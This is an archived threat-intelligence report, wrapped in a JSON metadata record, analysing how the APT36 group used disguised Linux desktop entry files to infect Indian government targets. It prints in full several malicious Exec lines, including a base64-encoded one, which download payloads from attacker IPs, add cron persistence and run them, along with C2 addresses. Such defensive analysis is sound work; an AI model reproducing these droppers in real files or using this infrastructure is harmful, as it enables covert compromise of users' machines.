{
	"id": "1e38064d-bee2-46cd-bb5a-33ce4ef6ab57",
	"created_at": "2026-04-06T00:17:55.353385Z",
	"updated_at": "2026-04-10T13:12:05.88279Z",
	"deleted_at": null,
	"sha1_hash": "407423e2af3d2bd6c14f2b254f19759f23e8edaa",
	"title": "APT36's Updated Arsenal | ThreatLabz",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 1204281,
	"plain_text": "APT36's Updated Arsenal | ThreatLabz\r\nBy Sudeep Singh\r\nPublished: 2023-09-12 · Archived: 2026-04-02 12:20:45 UTC\r\nMalicious Linux Desktop Entry Files as New Attack Vectors\r\nThe utilization of Linux desktop entry files by APT36 as an attack vector has never been documented before. This attack vector is fairly new and appears to be utilized in very low-volume attacks. So far, our research team has discovered three samples - all of which have 0 detection on VirusTotal.\r\nWe first observed an occurrence in May 2023 when a credential phishing website used to target Indian government employees was also found to be hosting a redirector to distribute ZIP archives containing malicious Linux desktop entry files.\r\nNational Informatics Center (NIC), India Phishing Attack - May 2023\r\nIn May 2023, we discovered a credential phishing site, email9ov[.]in, targeting Indian government officials by masquerading as the official login portal for National Informatics Center (NIC), India. We notified NIC in May 2023 about this website and the associated threat intel.\r\nWe also noticed that the same phishing website was using the hxxps://email9ov[.]in/VISIT_OF_MEDICAL URL to redirect visitors to the hxxp://103.2.232[.]82:8081/Tri-Service-Exercise/Delegation_Saudi_Arabia.zip URL.\r\nFrom here, a visitor would download a ZIP archive containing a maliciously crafted Linux desktop entry file.\r\nHere are some technical details about this case:\r\nZIP archive MD5 hash: 9c66f8c0c970822985600bed04e56434\r\nZIP filename: Delegation_Saudi_Arabia.zip\r\nDesktop entry file MD5 hash: f27a4968af4ed64baef8e086516e86ac\r\nDesktop entry filename: Delegation_Saudi_Arabia.desktop\r\nDesktop entry file analysis\r\nWe found the following content in the desktop entry file:\r\n[Desktop Entry]\r\nEncoding=UTF-8\r\nName=Delegation_Saudi_Arabia.pdf\r\nExec=sh -c \"echo 'L3Vzci9iaW4vd2dldCAnaHR0cDovLzEwMy4yLjIzMi44Mjo4MDgxL1RyaS1TZXJ2aWNlLUV4ZXJjaXNlL0RlbGVnYXRpb25fU2F1ZGlfQXJhYmlhLnBkZicgLU8gL3RtcC9EZWxlZ2F0aW9uX1NhdWRpX0FyYWJpYS5wZGY7IC91c3IvYmluL3dnZXQgJ2h0dHA6Ly8xMDMuMi4yMzIuODI6ODA4MS9JU0VQQy0xMi0yMDIzLUFnZW5kYS1mb3ItbWVldGluZy8xODUnIC1PIC90bXAvMTg1LmVsZjsgY2QgL3RtcDsgY2htb2QgK3ggMTg1LmVsZjtsaWJyZW9mZmljZSAvdG1wL0RlbGVnYXRpb25fU2F1ZGlfQXJhYmlhLnBkZiB8IC4vMTg1LmVsZg==' | base64 -d | sh\"\r\nTerminal=false\r\nType=Application\r\nIcon=x-office-document\r\nThe icon of this desktop entry file is set to \"x-office-document\" to seem like an innocent Office document.\r\nThe base64-encoded command present inside the desktop entry file decodes to:\r\n/usr/bin/wget 'hxxp://103.2.232[.]82:8081/Tri-Service-Exercise/Delegation_Saudi_Arabia.pdf' -O /tmp/Delegation_Saudi_Arabia.pdf; /usr/bin/wget 'hxxp://103.2.232[.]82:8081/ISEPC-12-2023-Agenda-for-meeting/185' -O /tmp/185.elf; cd /tmp; chmod +x 185.elf;libreoffice /tmp/Delegation_Saudi_Arabia.pdf | ./185\r\nThe command decoded above performs the following actions:\r\n1. Downloads the decoy PDF and saves it in the /tmp directory with the filename: Delegation_Saudi_Arabia.pdf.\r\n2. Downloads the Linux payload and saves it in the /tmp directory with the filename: 185.elf.\r\n3. Marks the Linux binary as executable.\r\n4. Uses LibreOffice to open and display the decoy PDF file.\r\n5. Executes the Linux payload.\r\nIn this case, the Linux payload was a cross-platform binary designed to run on both Linux and WSL (Windows Subsystem for Linux) machines. Since it did not contain a fully functional C2 mechanism at the time of analysis, we believe it was still in a development phase and used by the threat actor as an initial test.\r\nTo read about “Lee” agent’s cross-platform capabilities, visit the Lumen blog.\r\nThe content inside the decoy PDF file is displayed in the image below.\r\nFigure 5: Decoy PDF displayed to the user.\r\nThe PDF appears to be a document from the Indian Ministry of Defence describing the visit of nine members of a delegation from Saudi Arabia, where they discussed issues with Indian Armed Forces medical officials.\r\nInflated File Attack - June 2023\r\nBeginning in June 2023, we detected APT36 establishing their operational infrastructure on a server with the IP address 153.92.220[.]59. The threat actor proceeded to register multiple domains hosted on this IP. Further insight into this attacker-controlled infrastructure is available in the Threat Actor Infrastructure section.\r\nIn August, we noted a significant development where a few of these domains served as the hosting platform for decoy PDF files. These PDFs were linked within the malicious Linux desktop entry files, which the threat actor distributed enclosed in ZIP archives.\r\nHere are some technical details about this case:\r\nZIP archive MD5 hash: 36b19ca8737c63b9c9a3365ff4968ef5\r\nZIP filename: Meeting_agenda.zip\r\nDesktop entry file MD5 hash: 65167974b397493fce320005916a13e9\r\nDesktop entry filename: approved_copy.desktop\r\nDesktop entry file analysis\r\nThe first anomaly we observed was the large size of the Linux desktop entry file. A size larger than 1 MB for a Linux desktop entry file is rare. Reviewing the file revealed that the threat actor inflated the size of the file by adding more than a million \"#\" characters. We believe this was an attempt by the threat actor to bypass security scanning solutions.\r\nThe image below shows the extra characters added to the inflated Linux desktop entry file.\r\nFigure 6: The inflated Linux desktop entry file.\r\nThe relevant content from the Linux desktop entry file is shown below.\r\n[Desktop Entry]\r\nType=Application\r\nName=approved_copy.pdf\r\nExec=bash -c \"xdg-open 'https://admin-dept[.]in//approved_copy.pdf' \u0026\u0026 mkdir -p ~/.local/share \u0026\u0026 wget 64.227.133[.]222/zswap-xbusd -O ~/.local/share/zswap-xbusd \u0026\u0026 chmod +x ~/.local/share/zswap-xbusd; echo '@reboot ~/.local/share/zswap-xbusd'\u003e\u003e/dev/shm/myc.txt; crontab -u `whoami` /dev/shm/myc.txt; rm /dev/shm/myc.txt; ~/.local/share/zswap-xbusd\"\r\nIcon=application-pdf\r\nName[en_US]=approved_copy.desktop\r\nThis desktop file performs these main operations:\r\n1. Downloads the decoy PDF file from the https://admin-dept[.]in/approved_copy.pdf URL and displays it to the victim. This decoy file contains an error message to distract the user. Figure 7 shows that the icon of this desktop file is set to application-pdf, which is done to disguise the malware as an innocuous file.\r\n2. Creates a hidden directory path called .local/share in the user's home directory.\r\n3. Downloads the Linux payload from the URL 64.227.133[.]222/zswap-xbusd using wget. Saves it as zswap-xbusd in the previously created hidden directory.\r\n4. Writes a short shell script to the file /dev/shm/myc.txt. The shell script reboots the machine and then launches the Linux payload.\r\n5. Sets up a cron job under the current username to run the contents of the /dev/shm/myc.txt script.\r\n6. Deletes the shell script.\r\n7. Executes the Linux payload.\r\nFigure 7: The icon of the desktop configuration file is set to PDF to make it more convincing.\r\nAt the time of our analysis, the server 64.227.133[.]222 was not serving the Linux payload. We continued monitoring this infrastructure and noticed that on Aug 29, 2023, a new domain called admin-br[.]in was registered and used to distribute a new Linux desktop entry file. In this instance, we were able to retrieve the payloads and conclude the threat attribution to APT36.\r\nHere is metadata from the new Linux desktop entry file:\r\nMD5 hash: 574013c4a22ca2d8d8c76e65ef5e8059\r\nFilename: approved_copy.desktop\r\nThe relevant content from the Linux desktop entry file is shown below.\r\n[Desktop Entry]\r\nType=Application\r\nName=approved_copy.pdf\r\nExec=bash -c \"xdg-open 'https://admin-br[.]in//approved_copy.pdf' \u0026\u0026 mkdir -p ~/.local/share \u0026\u0026 wget 64.227.138[.]127/4200f0916f146d2ac5448e91a3afe1b3/pickle-help -O ~/.local/share/pickle-help \u0026\u0026 chmod +x ~/.local/share/pickle-help;~/.local/share/pickle-help \u003e/dev/null 2\u003e\u00261 \u0026 sleep 5; wget 134.209.159[.]9/4200f0916f146d2ac5448e91a3afe1b3/ziputils-help -O ~/.local/share/ziputils-help \u0026\u0026 chmod +x ~/.local/share/ziputils-help; echo '@reboot ~/.local/share/ziputils-help'\u003e\u003e/dev/shm/myc.txt;echo '@reboot ~/.local/share/ziputils-help'\u003e\u003e/dev/shm/myc.txt; crontab -u `whoami` /dev/shm/myc.txt; rm /dev/shm/myc.txt;~/.local/share/ziputils-help \u0026\"\r\nIcon=application-pdf\r\nName[en_US]=approved_copy.desktop\r\nThe functionality of this file is similar to the previous Linux desktop entry file.\r\nThe image below shows a decoy PDF file displaying an error message stating “Failed to load the PDF document”. This is used to distract the user while malicious activities occur in the background.\r\nFigure 8: The decoy PDF file displayed to the user.\r\nIn this case, the Linux desktop entry file retrieves the malicious Linux payloads from the servers at:\r\n64.227.138[.]127\r\n134.209.159[.]9\r\nThe two files retrieved are cleverly named to disguise themselves as legitimate software utilities.\r\nHere is the metadata of the Linux payloads:\r\nMD5 hash: 98279047a7db080129e5ec84533822ef\r\nFilename: pickle-help\r\nMD5 hash: 248d4e6bb0f32afd7a1cfb975910235a\r\nFilename: ziputils-help\r\nA quick technical analysis determined these Linux payloads as Mythic Poseidon binaries. Since Mythic is an open-source framework that is well-documented on GitHub, we will not explore its technical details in this blog.\r\nThe corresponding C2 servers extracted from each malicious Linux payload are listed below.\r\nTable 2: C2 servers from malicious Linux payload\r\nC2 IP ADDRESS PORT\r\n108.61.163[.]195 7443\r\n64.176.40[.]100 7443\r\nThe C2 panel for Mythic Poseidon can be accessed by visiting the URI path /new/login on the server running at port 7443.\r\nFor instance, the C2 panel for 108.61.163[.]195 can be accessed at hxxps://108.61.163[.]195:7443/new/login.\r\nFigure 9: The Mythic C2 panel for the Poseidon binary.\r\nSource: https://www.zscaler.com/blogs/security-research/peek-apt36-s-updated-arsenal",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://www.zscaler.com/blogs/security-research/peek-apt36-s-updated-arsenal"
	],
	"report_names": [
		"peek-apt36-s-updated-arsenal"
	],
	"threat_actors": [
		{
			"id": "414d7c65-5872-4e56-8a7d-49a2aeef1632",
			"created_at": "2025-08-07T02:03:24.7983Z",
			"updated_at": "2026-04-10T02:00:03.76109Z",
			"deleted_at": null,
			"main_name": "COPPER FIELDSTONE",
			"aliases": [
				"APT36 ",
				"Earth Karkaddan ",
				"Gorgon Group ",
				"Green Havildar ",
				"Mythic Leopard ",
				"Operation C-Major ",
				"Operation Transparent Tribe ",
				"Pasty Draco ",
				"ProjectM ",
				"Storm-0156 "
			],
			"source_name": "Secureworks:COPPER FIELDSTONE",
			"tools": [
				"CapraRAT",
				"Crimson RAT",
				"DarkComet",
				"ElizaRAT",
				"LuminosityLink",
				"ObliqueRAT",
				"Peppy",
				"njRAT"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "eb3f4e4d-2573-494d-9739-1be5141cf7b2",
			"created_at": "2022-10-25T16:07:24.471018Z",
			"updated_at": "2026-04-10T02:00:05.002374Z",
			"deleted_at": null,
			"main_name": "Cron",
			"aliases": [],
			"source_name": "ETDA:Cron",
			"tools": [
				"Catelites",
				"Catelites Bot",
				"CronBot",
				"TinyZBot"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "fce5181c-7aab-400f-bd03-9db9e791da04",
			"created_at": "2022-10-25T15:50:23.759799Z",
			"updated_at": "2026-04-10T02:00:05.3002Z",
			"deleted_at": null,
			"main_name": "Transparent Tribe",
			"aliases": [
				"Transparent Tribe",
				"COPPER FIELDSTONE",
				"APT36",
				"Mythic Leopard",
				"ProjectM"
			],
			"source_name": "MITRE:Transparent Tribe",
			"tools": [
				"DarkComet",
				"ObliqueRAT",
				"njRAT",
				"Peppy"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "c68fa27f-e8d9-4932-856b-467ccfe39997",
			"created_at": "2023-01-06T13:46:38.450585Z",
			"updated_at": "2026-04-10T02:00:02.980334Z",
			"deleted_at": null,
			"main_name": "Operation C-Major",
			"aliases": [
				"APT36",
				"APT 36",
				"TMP.Lapis",
				"COPPER FIELDSTONE",
				"Storm-0156",
				"Transparent Tribe",
				"ProjectM",
				"Green Havildar",
				"Earth Karkaddan",
				"C-Major",
				"Mythic Leopard"
			],
			"source_name": "MISPGALAXY:Operation C-Major",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		}
	],
	"ts_created_at": 1775434675,
	"ts_updated_at": 1775826725,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/407423e2af3d2bd6c14f2b254f19759f23e8edaa.pdf",
		"text": "https://archive.orkl.eu/407423e2af3d2bd6c14f2b254f19759f23e8edaa.txt",
		"img": "https://archive.orkl.eu/407423e2af3d2bd6c14f2b254f19759f23e8edaa.jpg"
	}
}